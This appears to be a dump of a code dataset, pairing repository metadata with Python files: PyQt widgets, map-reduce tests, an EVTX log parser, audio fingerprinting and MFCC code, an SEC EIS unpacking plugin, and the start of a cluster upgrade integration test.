hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringdate 2015-01-01 00:00:47 2022-03-31 23:42:18 ⌀ | max_issues_repo_issues_event_max_datetime stringdate 2015-01-01 17:43:30 2022-03-31 23:59:58 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3a79851a367aea689a1293265d02727ae30bb330 | 7,877 | py | Python | cvstudio/view/widgets/common/treeview_model.py | haruiz/PytorchCvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 32 | 2019-10-31T03:10:52.000Z | 2020-12-23T11:50:53.000Z | cvstudio/view/widgets/common/treeview_model.py | haruiz/CvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 19 | 2019-10-31T15:06:05.000Z | 2020-06-15T02:21:55.000Z | cvstudio/view/widgets/common/treeview_model.py | haruiz/PytorchCvStudio | ccf79dd0cc0d61f3fd01b1b5d96f7cda7b681eef | [
"MIT"
] | 8 | 2019-10-31T03:32:50.000Z | 2020-07-17T20:47:37.000Z | import itertools
import typing
from typing import Any
from PyQt5 import QtCore
from PyQt5.QtCore import QModelIndex, pyqtSignal, QObject
from PyQt5.QtGui import QColor
from PyQt5.QtWidgets import QAbstractItemDelegate, QWidget, QStyleOptionViewItem, QSpinBox
class CustomNode(object):
def __init__(self, data=None, success_icon=None, hover_icon=None, error_icon=None, level=-1, tag=None, status=1,
tooltip=None):
self._data = data
if isinstance(data, tuple):
self._data = list(data)
if isinstance(data, str):
self._data = [data]
self._tag = tag
self._enable = False
self._success_icon = success_icon
self._error_icon = error_icon if error_icon else success_icon
self._hover_icon = hover_icon if hover_icon else success_icon
self._children = []
self._parent = None
self._level = level
self._row = 0
self._status = status
self._tooltip_content = tooltip
def get_data(self, column):
if 0 <= column < len(self._data):
return self._data[column]
def set_data(self, column, value):
self._data[column] = value
def columnCount(self):
return len(self._data) if self._data else 0
@property
def tooltip_content(self):
return self._tooltip_content
@tooltip_content.setter
def tooltip_content(self, value):
self._tooltip_content = value
@property
def tag(self):
return self._tag
@tag.setter
def tag(self, val):
self._tag = val
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def success_icon(self):
return self._success_icon
@success_icon.setter
def success_icon(self, value):
self._success_icon = value
@property
def error_icon(self):
return self._error_icon
@error_icon.setter
def error_icon(self, value):
self._error_icon = value
@property
def children(self):
return self._children
@children.setter
def children(self, value):
self._children = value
@property
def parent(self):
return self._parent
@parent.setter
def parent(self, value):
self._parent = value
@property
def level(self):
return self._level
@level.setter
def level(self, value):
self._level = value
@property
def row(self):
return self._row
@row.setter
def row(self, value):
self._row = value
def child(self, index):
if 0 <= index < len(self.children):
return self.children[index]
def addChild(self, child):
child._parent = self
child._row = len(self.children) # get the last index
self.children.append(child)
def removeChild(self, position):
if position < 0 or position > len(self._children):
return False
child = self._children.pop(position)
child._parent = None
return True
class CustomModelSignals(QObject):
data_changed = pyqtSignal(CustomNode, int, str, str)
class WidgetDelegate(QAbstractItemDelegate):
def __init__(self):
super(WidgetDelegate, self).__init__()
def createEditor(self, parent: QWidget, option: QStyleOptionViewItem, index: QtCore.QModelIndex) -> QWidget:
editor = QSpinBox(parent)
editor.setFrame(False)
editor.setMinimum(0)
editor.setMaximum(100)
return editor
class CustomModel(QtCore.QAbstractItemModel):
def __init__(self, columns):
QtCore.QAbstractItemModel.__init__(self)
self._root = CustomNode(list(itertools.repeat("", len(columns))))
self.signals = CustomModelSignals()
self._columns = columns
@property
def root(self):
return self._root
def headerData(self, section: int, orientation: QtCore.Qt.Orientation, role: int = ...) -> typing.Any:
if role == QtCore.Qt.DisplayRole:
return self._columns[section]
return super(CustomModel, self).headerData(section, orientation, role)
def addChild(self, node, parent=None):
if not parent or not parent.isValid():
parent = self._root
else:
parent = parent.internalPointer()
parent.addChild(node)
def setData(self, index: QModelIndex, value: Any, role=None):
if index.isValid():
if role == QtCore.Qt.EditRole:
node: CustomNode = index.internalPointer()
if value:
old_val = node.get_data(0)
node.set_data(0, value)
self.signals.data_changed.emit(node, role, old_val, value)
return True
else:
return False
return False
def removeChild(self, index: QModelIndex):
self.beginRemoveRows(index.parent(), index.row(), index.row())
success = self.removeRow(index.row(), parent=index.parent())
self.endRemoveRows()
return success
def removeRow(self, row, parent):
# if not parent
if not parent.isValid():
parentNode = self._root
else:
parentNode = parent.internalPointer() # the node
parentNode.removeChild(row)
return True
def data(self, index: QModelIndex, role=None):
if not index.isValid():
return None
node: CustomNode = index.internalPointer()
if role == QtCore.Qt.DisplayRole:
val = node.get_data(index.column())
return val
elif role == QtCore.Qt.DecorationRole and index.column() == 0:
if node.status == 1:
return node.success_icon
else:
return node.error_icon
elif role == QtCore.Qt.TextColorRole:
if node.level == 2 and node.status == -1:
return QColor(255, 0, 0)
elif role == QtCore.Qt.ToolTipRole:
return node.tooltip_content
return None
def flags(self, index: QModelIndex):
if not index.isValid():
return QtCore.Qt.NoItemFlags
flags = super(CustomModel, self).flags(index)
node: CustomNode = index.internalPointer()
# if node.level == 1:
# return (flags | QtCore.Qt.ItemIsEditable )
# else:
# return (flags | QtCore.Qt.ItemIsSelectable)
return (flags | QtCore.Qt.ItemIsEditable)
def rowCount(self, parent: QModelIndex = None, *args, **kwargs):
if parent.isValid(): # internal nodes
child: CustomNode = parent.internalPointer()
return len(child.children)
return len(self._root.children) # first level nodes
def columnCount(self, parent: QModelIndex = None, *args, **kwargs):
if parent.isValid():
return parent.internalPointer().columnCount()
return self._root.columnCount()
def parent(self, in_index: QModelIndex = None):
if in_index.isValid():
parent = in_index.internalPointer().parent
if parent:
return QtCore.QAbstractItemModel.createIndex(self, parent.row, 0, parent)
return QtCore.QModelIndex()
def index(self, row: int, column: int, parent=None, *args, **kwargs):
if not parent or not parent.isValid():
parent_node = self._root
else:
parent_node = parent.internalPointer()
if not QtCore.QAbstractItemModel.hasIndex(self, row, column, parent):
return QtCore.QModelIndex()
child = parent_node.child(row)
if child:
return QtCore.QAbstractItemModel.createIndex(self, row, column, child)
else:
return QtCore.QModelIndex()
| 30.296154 | 116 | 0.612416 |
3a7af5581758219d8326f2091b7b6047cf305d66 | 1,761 | py | Python | pyrallel/tests/test_map_reduce.py | usc-isi-i2/paralyzer | 2991e9e74f17e35d8c7d9f86d57c5c7f7a311915 | [
"MIT"
] | 13 | 2019-07-02T22:41:46.000Z | 2022-02-20T13:30:00.000Z | pyrallel/tests/test_map_reduce.py | usc-isi-i2/paralyzer | 2991e9e74f17e35d8c7d9f86d57c5c7f7a311915 | [
"MIT"
] | 14 | 2019-07-03T18:04:25.000Z | 2021-05-20T20:45:33.000Z | pyrallel/tests/test_map_reduce.py | usc-isi-i2/paralyzer | 2991e9e74f17e35d8c7d9f86d57c5c7f7a311915 | [
"MIT"
] | 3 | 2020-02-12T21:54:17.000Z | 2020-08-24T20:41:18.000Z | import multiprocessing as mp
from pyrallel.map_reduce import MapReduce
NUM_OF_PROCESSOR = max(2, int(mp.cpu_count() / 2))
def test_map_reduce_number():
def mapper(x):
return x
def reducer(r1, r2):
return r1 + r2
mr = MapReduce(3, mapper, reducer)
mr.start()
mr.add_task(1)
mr.task_done()
assert mr.join() == 1
mr = MapReduce(NUM_OF_PROCESSOR, mapper, reducer)
mr.start()
mr.add_task(1)
mr.task_done()
assert mr.join() == 1
mr = MapReduce(1, mapper, reducer)
mr.start()
for i in range(1, 101):
mr.add_task(i)
mr.task_done()
assert mr.join() == 5050
mr = MapReduce(NUM_OF_PROCESSOR, mapper, reducer)
mr.start()
for i in range(1, 101):
mr.add_task(i)
mr.task_done()
assert mr.join() == 5050
mr = MapReduce(NUM_OF_PROCESSOR, mapper, reducer)
mr.start()
for i in range(1, 100001):
mr.add_task(i)
mr.task_done()
assert mr.join() == 5000050000
def test_map_reduce_object():
def mapper(k, v):
return {k: v}
def reducer(r1, r2):
for k1, v1 in r1.items():
if k1 in r2:
r2[k1] += v1
else:
r2[k1] = v1
return r2
mr = MapReduce(1, mapper, reducer)
mr.start()
for i in range(100):
if i % 2 == 0:
mr.add_task('a', i)
else:
mr.add_task('b', i)
mr.task_done()
assert mr.join() == {'a': 2450, 'b': 2500}
mr = MapReduce(NUM_OF_PROCESSOR, mapper, reducer)
mr.start()
for i in range(100):
if i % 2 == 0:
mr.add_task('a', i)
else:
mr.add_task('b', i)
mr.task_done()
assert mr.join() == {'a': 2450, 'b': 2500}
| 21.216867 | 53 | 0.540034 |
3a7bafa3c7ab3354d60a1fcd0376c7ade47cb21d | 707 | py | Python | evtx_to_dataframe.py | esua/evtx_to_dataframe | 390bf470e92092e66827373ed7e8b012a4fe94f6 | [
"Apache-2.0"
] | null | null | null | evtx_to_dataframe.py | esua/evtx_to_dataframe | 390bf470e92092e66827373ed7e8b012a4fe94f6 | [
"Apache-2.0"
] | null | null | null | evtx_to_dataframe.py | esua/evtx_to_dataframe | 390bf470e92092e66827373ed7e8b012a4fe94f6 | [
"Apache-2.0"
] | null | null | null | import argparse
import Evtx.Evtx as evtx
import pandas as pd
import xmltodict
import re
parser = argparse.ArgumentParser(description="Convert Windows EVTX event log file to DataFrame.")
parser.add_argument("evtx", type=str, help="Path to the Windows EVTX event log file")
args = parser.parse_args()
with evtx.Evtx(args.evtx) as log:
data_dicts = []
for record in log.records():
elem = record.xml()
elem = re.sub(r'<Data Name="(.+)">(.+)</Data>', r'<\1>\2</\1>', elem) # Replace contents of EventData
data_dict = xmltodict.parse(elem) # convert xml to dict
data_dicts.append(data_dict)
df = pd.json_normalize(data_dicts) # convert dict to pd.DataFrame
print(df)
| 33.666667 | 110 | 0.693069 |
3a7bc36048999e619539f1b4ea6519f544722e26 | 562 | py | Python | test/sandwich.py | DynamicCai/Dynamic-Explorer | c909206b3db52f76f23499b1cb43520d3475b14e | [
"MIT"
] | null | null | null | test/sandwich.py | DynamicCai/Dynamic-Explorer | c909206b3db52f76f23499b1cb43520d3475b14e | [
"MIT"
] | null | null | null | test/sandwich.py | DynamicCai/Dynamic-Explorer | c909206b3db52f76f23499b1cb43520d3475b14e | [
"MIT"
] | null | null | null |
sandwich_meat={
1:{'chicken':3},
2:{'beef':5},
3:{'pork':4},
4:{'bacon':4},
5:{'sausage':4},
6:{'omelette':2},
7:{'none':0}
}
sandwich_sauce=['mayonnaise','ketchup','yellow mustard','black pepper sauce','cheese','none']
sandwich_vegetable=['lettuce','sliced tomatoes','sliced pickles','potato salad','red cabbage','none']
sandwich_extra={
1:{'extra cheese':3},
2:{'extra pickles':1},
3:{'double meat':'X2'},
4:{'none':0}
}
ordered_dish={
'm7eat':
}
print('meat', 'sauce', 'vegetable', 'extra')
| 18.733333 | 101 | 0.565836 |
3a7c85d6a1879df3d91cd853104103d5c1ce8afa | 1,553 | py | Python | paprotka/feature/cepstral.py | michalsosn/paprotka | d6079eefbade2cb8be5896777a7d50ac968d42ec | [
"MIT"
] | 1 | 2019-10-29T04:14:40.000Z | 2019-10-29T04:14:40.000Z | paprotka/feature/cepstral.py | michalsosn/paprotka | d6079eefbade2cb8be5896777a7d50ac968d42ec | [
"MIT"
] | null | null | null | paprotka/feature/cepstral.py | michalsosn/paprotka | d6079eefbade2cb8be5896777a7d50ac968d42ec | [
"MIT"
] | null | null | null | import math
import numpy as np
from scipy import signal, fftpack
def pre_emphasize(data, pre_emphasis=0.97):
return np.append(data[0], data[1:] - pre_emphasis * data[:-1])
def hz_to_mel(hz):
return 2595 * math.log10(1 + hz / 700)
def mel_to_hz(mel):
return 700 * (10 ** (mel / 2595) - 1)
def make_mel_filters(half, rate, filter_num):
min_mel = 0
max_mel = hz_to_mel(rate / 2)
mel_points = np.linspace(min_mel, max_mel, filter_num + 2)
hz_points = mel_to_hz(mel_points)
bin_points = np.floor((2 * half + 1) * hz_points / rate).astype(np.int32)
filters = np.zeros((filter_num, half))
for i in range(filter_num):
start, mid, end = bin_points[i], bin_points[i + 1], bin_points[i + 2]
filters[i, start:mid] = np.linspace(0, 1, mid - start, endpoint=False)
filters[i, mid:end] = np.linspace(1, 0, end - mid, endpoint=True)
return filters
def calculate_filter_bank(sound, filter_num=30, result_scaling=np.log1p, *args, **kwargs):
frequencies, times, transform = signal.stft(sound.data, sound.rate, *args, **kwargs)
power_spectrum = np.abs(transform) ** 2
filters = make_mel_filters(frequencies.size, sound.rate, filter_num)
coefficients = (filters @ power_spectrum).T
return result_scaling(coefficients)
def calculate_mfcc(sound, num_ceps=12, *args, **kwargs):
filter_banks = calculate_filter_bank(sound, *args, **kwargs)
mfcc = fftpack.dct(filter_banks, norm='ortho')
if num_ceps is None:
return mfcc
return mfcc[:, 1:(num_ceps + 1)]
| 33.042553 | 90 | 0.675467 |
3a7d8a539d82fbecac85da845cd748fe400b1a12 | 2,688 | py | Python | arelle/plugin/unpackSecEisFile.py | DataFinnovation/Arelle | d4bf45f56fc9249f75ab22e6217dbe55f0510841 | [
"Apache-2.0"
] | 292 | 2015-01-27T03:31:51.000Z | 2022-03-26T07:00:05.000Z | arelle/plugin/unpackSecEisFile.py | DataFinnovation/Arelle | d4bf45f56fc9249f75ab22e6217dbe55f0510841 | [
"Apache-2.0"
] | 94 | 2015-04-18T23:03:00.000Z | 2022-03-28T17:24:55.000Z | arelle/plugin/unpackSecEisFile.py | DataFinnovation/Arelle | d4bf45f56fc9249f75ab22e6217dbe55f0510841 | [
"Apache-2.0"
] | 200 | 2015-01-13T03:55:47.000Z | 2022-03-29T12:38:56.000Z | '''
Unpack SEC EIS File is an example of a plug-in to the GUI menu
that will save the unpacked contents of an SEC EIS File in a directory.
(c) Copyright 2012 Mark V Systems Limited, All rights reserved.
'''
def unpackEIS(cntlr, eisFile, unpackToDir):
from arelle.FileSource import openFileSource
filesource = openFileSource(eisFile, cntlr, checkIfXmlIsEis=True)
if not filesource.isArchive:
cntlr.addToLog("[info:unpackEIS] Not recognized as an EIS file: " + eisFile)
return
import os, io
unpackedFiles = []
for file in filesource.dir:
fIn, encoding = filesource.file(os.path.join(eisFile,file))
with open(os.path.join(unpackToDir, file), "w", encoding=encoding) as fOut:
fOut.write(fIn.read())
unpackedFiles.append(file)
fIn.close()
cntlr.addToLog("[info:unpackEIS] Unpacked files " + ', '.join(unpackedFiles))
def unpackSecEisMenuEntender(cntlr, menu, *args, **kwargs):
def askUnpackDirectory():
eisFile = cntlr.uiFileDialog("open",
title=_("arelle - Open SEC EIS file"),
initialdir=cntlr.config.setdefault("openSecEisFileDir","."),
filetypes=[(_("Compressed EIS file .eis"), "*.eis"), (_("Uncompressed EIS file .xml"), "*.xml")],
defaultextension=".eis")
if not eisFile:
return
from tkinter.filedialog import askdirectory
unpackToDir = askdirectory(parent=cntlr.parent,
initialdir=cntlr.config.setdefault("unpackSecEisFileDir","."),
title='Please select a directory for unpacked EIS Contents')
import os
cntlr.config["openSecEisFileDir"] = os.path.dirname(eisFile)
cntlr.config["unpackSecEisFileDir"] = unpackToDir
cntlr.saveConfig()
try:
unpackEIS(cntlr, eisFile, unpackToDir)
except Exception as ex:
cntlr.addToLog("[arelle:exception] Unpack EIS exception: " + str(ex));
menu.add_command(label="Unpack SEC EIS File",
underline=0,
command=lambda: askUnpackDirectory() )
__pluginInfo__ = {
'name': 'Unpack SEC EIS File',
'version': '0.9',
'description': "This plug-in unpacks the contents of an SEC EIS file.",
'license': 'Apache-2',
'author': 'Mark V Systems Limited',
'copyright': '(c) Copyright 2012 Mark V Systems Limited, All rights reserved.',
# classes of mount points (required)
'CntlrWinMain.Menu.Tools': unpackSecEisMenuEntender,
}
| 43.354839 | 134 | 0.604911 |
3a7e02c43c6ebf2859a5eb96f826707b1b0a7b33 | 2,251 | py | Python | fpcalc.py | johnlawsharrison/pyacoustid | 55321b316f09e782a1c0914826419be799908e01 | [
"MIT"
] | 203 | 2016-01-18T14:05:49.000Z | 2022-03-25T04:04:42.000Z | fpcalc.py | johnlawsharrison/pyacoustid | 55321b316f09e782a1c0914826419be799908e01 | [
"MIT"
] | 41 | 2016-03-08T10:28:14.000Z | 2021-11-26T20:53:15.000Z | fpcalc.py | johnlawsharrison/pyacoustid | 55321b316f09e782a1c0914826419be799908e01 | [
"MIT"
] | 56 | 2016-01-09T04:22:40.000Z | 2022-01-29T16:01:39.000Z | #!/usr/bin/env python
# This file is part of pyacoustid.
# Copyright 2012, Lukas Lalinsky.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Simple script for calculating audio fingerprints, using the same
arguments/output as the fpcalc utility from Chromaprint."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import argparse
import sys
import acoustid
import chromaprint
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-length', metavar='SECS', type=int, default=120,
help='length of the audio data used for fingerprint '
'calculation (default 120)')
parser.add_argument('-raw', action='store_true',
help='output the raw uncompressed fingerprint')
parser.add_argument('paths', metavar='FILE', nargs='+',
help='audio file to be fingerprinted')
args = parser.parse_args()
# make gst not try to parse the args
del sys.argv[1:]
first = True
for i, path in enumerate(args.paths):
try:
duration, fp = acoustid.fingerprint_file(path, args.length)
except Exception:
print("ERROR: unable to calculate fingerprint "
"for file %s, skipping" % path, file=sys.stderr)
continue
if args.raw:
raw_fp = chromaprint.decode_fingerprint(fp)[0]
fp = ','.join(map(str, raw_fp))
if not first:
print
first = False
print('FILE=%s' % path)
print('DURATION=%d' % duration)
print('FINGERPRINT=%s' % fp.decode('utf8'))
if __name__ == '__main__':
main()
| 34.106061 | 77 | 0.660595 |
3a7e4975152b719956030d04fd87b6aff71f9b39 | 203 | py | Python | app/views/dashboard/leadership/__init__.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/dashboard/leadership/__init__.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | app/views/dashboard/leadership/__init__.py | Wern-rm/raton.by | 68f862f2bc0551bf2327e9d6352c0cde93f45301 | [
"MIT"
] | null | null | null | from app.views.dashboard.leadership.index import leaderships
from app.views.dashboard.leadership.delete import leadership_delete
from app.views.dashboard.leadership.activation import leadership_activated | 67.666667 | 74 | 0.8867 |
3a7ec9858eb7869bba6e4129ded3a123b302b0e2 | 3,071 | py | Python | Learning/button groups.py | atharva0300/PyQt5-Practice | 0feacca6518190646a345ce2ea75e071e7861ac5 | [
"MIT"
] | null | null | null | Learning/button groups.py | atharva0300/PyQt5-Practice | 0feacca6518190646a345ce2ea75e071e7861ac5 | [
"MIT"
] | null | null | null | Learning/button groups.py | atharva0300/PyQt5-Practice | 0feacca6518190646a345ce2ea75e071e7861ac5 | [
"MIT"
] | 1 | 2021-11-16T10:18:07.000Z | 2021-11-16T10:18:07.000Z | # Button Groups in Python
import PyQt5
from PyQt5.QtWidgets import QApplication, QHBoxLayout, QLabel, QButtonGroup, QMainWindow, QDialog, QPushButton, QVBoxLayout
import sys
from PyQt5 import QtGui
from PyQt5.QtGui import QFont, QPixmap
from PyQt5.QtCore import QSize
class window(QDialog):
def __init__(self):
super().__init__()
self.title = 'PyQt5 Widow '
self.left = 500
self.top = 200
self.width = 300
self.height = 250
self.iconName= './icons/file.png'
# calling the initwindow function
self.initwindow()
# creata a label
self.label = QLabel('Hello')
self.label.setFont(QtGui.QFont('Sanserif' , 13))
self.hbox.addWidget(self.label)
# set the self.layout to hbox
self.setLayout(self.hbox)
# calling the onPresed function
self.on_Pressed()
# show the window
self.show()
def initwindow(self):
self.setWindowIcon(QtGui.QIcon('./icons/file.png'))
self.setWindowTitle(self.title)
self.setGeometry(self.left , self.top , self.width , self.height)
# create a Hbox layout
self.hbox = QHBoxLayout()
# create a button group
self.buttongroup = QButtonGroup()
# connecting the button group with signal
self.buttongroup.buttonClicked[int].connect(self.on_Pressed)
# create 3 buttons
self.button1 = QPushButton('Python')
# add button1 to the Button Group
self.buttongroup.addButton(self.button1 , 1)
self.button1.setIcon(QtGui.QIcon('./icons/python.png'))
self.button1.setIconSize(QSize(40,40))
# ---------- #
# add the button group to hbox layout
self.hbox.addWidget(self.button1)
# Button 2 ----
self.button2 = QPushButton('C++')
# add button1 to the Button Group
self.buttongroup.addButton(self.button2 , 2)
self.button2.setIcon(QtGui.QIcon('./icons/cpp.png'))
self.button2.setIconSize(QSize(40,40))
# ---------- #
# add the button group to hbox layout
self.hbox.addWidget(self.button2)
# Button 3 ---
self.button3 = QPushButton('Java')
# add button1 to the Button Group
self.buttongroup.addButton(self.button3 , 3)
self.button3.setIcon(QtGui.QIcon('./icons/java.png'))
self.button3.setIconSize(QSize(40,40))
# ---------- #
# add the button group to hbox layout
self.hbox.addWidget(self.button3)
def on_Pressed(self):
for button in self.buttongroup.buttons():
if button is self.buttongroup.button(id) :
# give the text an id in the above line
self.label.setText(button.text() + ' Was clicked')
if __name__ == "__main__":
App = QApplication(sys.argv)
window= window()
sys.exit(App.exec())
| 28.700935 | 124 | 0.581895 |
3a7f65074a8ce42ce2f4be7f8b8b5034567b834f | 20,126 | py | Python | ct-tests/lib/crus_integration_test.py | Cray-HPE/cray-crus | 6643aa3eb3debe5cbe0088f6a30b7e56ca1b1f17 | [
"MIT"
] | null | null | null | ct-tests/lib/crus_integration_test.py | Cray-HPE/cray-crus | 6643aa3eb3debe5cbe0088f6a30b7e56ca1b1f17 | [
"MIT"
] | 1 | 2022-03-02T21:06:21.000Z | 2022-03-04T17:32:14.000Z | ct-tests/lib/crus_integration_test.py | Cray-HPE/cray-crus | 6643aa3eb3debe5cbe0088f6a30b7e56ca1b1f17 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# MIT License
#
# (C) Copyright 2020-2022 Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
"""
CRUS integration test
See crus_integration_test/argparse.py for command line usage.
### SETUP ###
1 Generate map of xnames, nids, and hostnames for target nodes (by default,
all computes)
2 Validate they work with the specified min/max node and step values.
3 Lookup BOS session template
4 Create empty starting, upgrading, and failed HSM groups
5 Create new session template for all target nodes
6 Create new session templates for the upgrading group
7 Use BOS to reboot all target nodes to new BOS session template
### TEST 1 ###
8 Put 1 node into starting group
9 Create CRUS session
10 Verify all goes well & delete CRUS session
### TEST 2 ###
11 Move all nodes into starting group.
Repeat steps 9-10, with step size that results in at least 2 steps
### TEST 3 ###
12 Select 2 nodes
13 Start slurm workload on 1 of them
14 Create CRUS session
15 Verify that CRUS waits while the slurm workloads run
16 Stop the slurm workloads
17 Verify that all goes well & delete CRUS session
### RESTORE NODES ###
18 Create CRUS session to reboot all nodes to base slurm template
19 Verify that all goes well & delete CRUS session
### CLEANUP ###
20 Delete new templates
21 Delete custom vcs branches
22 Delete new hsm groups
"""
from crus_integration_test.argparse import parse_args
from crus_integration_test.crus import verify_crus_waiting_for_quiesce
from crus_integration_test.hsm import create_hsm_groups
from crus_integration_test.slurm import complete_slurm_job, start_slurm_job, \
verify_initial_slurm_state
from crus_integration_test.utils import bos_reboot_nodes, create_bos_session_templates, \
monitor_crus_session, \
verify_results_of_crus_session
from common.bos import bos_session_template_validate_cfs, \
list_bos_session_templates, list_bos_sessions
from common.bosutils import delete_bos_session_templates, \
delete_cfs_configs, \
delete_hsm_groups, \
delete_vcs_repo_and_org
from common.cfs import describe_cfs_config
from common.crus import create_crus_session, delete_crus_session
from common.helpers import CMSTestError, create_tmpdir, debug, error_exit, exit_test, \
init_logger, info, log_exception_error, raise_test_exception_error, \
remove_tmpdir, section, subtest, warn
from common.hsm import set_hsm_group_members
from common.k8s import get_csm_private_key
from common.utils import get_compute_nids_xnames, validate_node_hostnames
from common.vcs import create_and_clone_vcs_repo
import random
import sys
TEST_NAME = "crus_integration_test"
def do_subtest(subtest_name, subtest_func, **subtest_kwargs):
"""
Log that we are about to run a subtest with the specified name, then call the specified function
with the specified arguments. Raise exception in case of an error.
"""
subtest(subtest_name)
try:
return subtest_func(**subtest_kwargs)
except CMSTestError:
raise
except Exception as e:
raise_test_exception_error(e, "%s subtest" % subtest_name)
def do_test(test_variables):
"""
Main test body. Execute each subtest in turn.
"""
# =============================
# =============================
# SETUP
# =============================
# =============================
use_api = test_variables["use_api"]
if use_api:
info("Using API")
else:
info("Using CLI")
# We don't need the CSM private key until it comes time to ssh into the compute nodes, but we'd
# rather know up front if this fails, to save time
do_subtest("Get CSM private key (for later use to ssh to computes)", get_csm_private_key)
nid_to_xname, xname_to_nid = do_subtest("Find compute nids & xnames",
get_compute_nids_xnames, use_api=use_api,
nids=test_variables["nids"],
groups=test_variables["groups"],
xnames=test_variables["xnames"],
min_required=3)
test_variables["nids"] = sorted(list(nid_to_xname.keys()))
test_variables["xnames"] = sorted(list(nid_to_xname.values()))
nids = test_variables["nids"]
xnames = test_variables["xnames"]
info("nids: %s" % str(nids))
slurm_nid = random.choice(nids)
slurm_xname = nid_to_xname[slurm_nid]
test_nids = [ n for n in nids if n != slurm_nid ]
test_xnames = [ x for x in xnames if x != slurm_xname ]
debug("Slurm controller: nid %d (xname %s)" % (slurm_nid, slurm_xname))
debug("Worker nodes:")
for test_nid in sorted(test_nids):
debug(" nid %d (xname %s)" % (test_nid, nid_to_xname[test_nid]))
max_step_size = len(nids)
if test_variables["max_step_size"]:
max_step_size = min(max_step_size, test_variables["max_step_size"])
do_subtest("Validate node hostnames", validate_node_hostnames, nid_to_xname=nid_to_xname)
template_objects = do_subtest("List all BOS session templates", list_bos_session_templates,
use_api=use_api)
info("BOS session template: %s" % test_variables["template"])
if test_variables["template"] not in template_objects:
error_exit("No BOS session template found with name %s" % test_variables["template"])
else:
slurm_template_name = test_variables["template"]
cfs_config_name = do_subtest("Get CFS configuration name from %s BOS session template" % slurm_template_name,
bos_session_template_validate_cfs, bst=template_objects[slurm_template_name])
info("CFS configuration name in %s is %s" % (slurm_template_name, cfs_config_name))
test_variables["base_cfs_config_name"] = cfs_config_name
do_subtest("Validate CFS configuration %s" % cfs_config_name,
describe_cfs_config, use_api=use_api, name=cfs_config_name)
test_hsm_groups = test_variables["test_hsm_groups"]
do_subtest("Create hsm groups", create_hsm_groups, use_api=use_api, test_hsm_groups=test_hsm_groups)
tmpdir = do_subtest("Create temporary directory", create_tmpdir)
test_variables["tmpdir"] = tmpdir
# Always want to make sure that we have a template which does not match any of the others
# for both cfs branch and kernel parameters.
num_test_templates = 3
test_vcs_org = "crus-integration-test-org-%d" % random.randint(0,9999999)
test_vcs_repo = "crus-integration-test-repo-%d" % random.randint(0,9999999)
test_variables["test_vcs_org"] = test_vcs_org
test_variables["test_vcs_repo"] = test_vcs_repo
vcs_repo_dir = do_subtest("Create and clone VCS repo %s in org %s" % (test_vcs_repo, test_vcs_org),
create_and_clone_vcs_repo, orgname=test_vcs_org, reponame=test_vcs_repo,
testname=TEST_NAME, tmpdir=tmpdir)
test_variables["vcs_repo_dir"] = vcs_repo_dir
do_subtest("Create modified BOS session templates",
create_bos_session_templates,
num_to_create=num_test_templates,
use_api=use_api,
template_objects=template_objects,
test_variables=test_variables,
xname_to_nid=xname_to_nid)
test_template_names = test_variables["test_template_names"]
base_test_template, test_template1, test_template2 = test_template_names
debug("Base test template: %s" % base_test_template)
debug("Test template 1: %s" % test_template1)
debug("Test template 2: %s" % test_template2)
# Use BOS to reboot all target nodes to new BOS session template
xname_template_map = dict()
do_subtest("Reboot all target nodes to %s template" % base_test_template, bos_reboot_nodes,
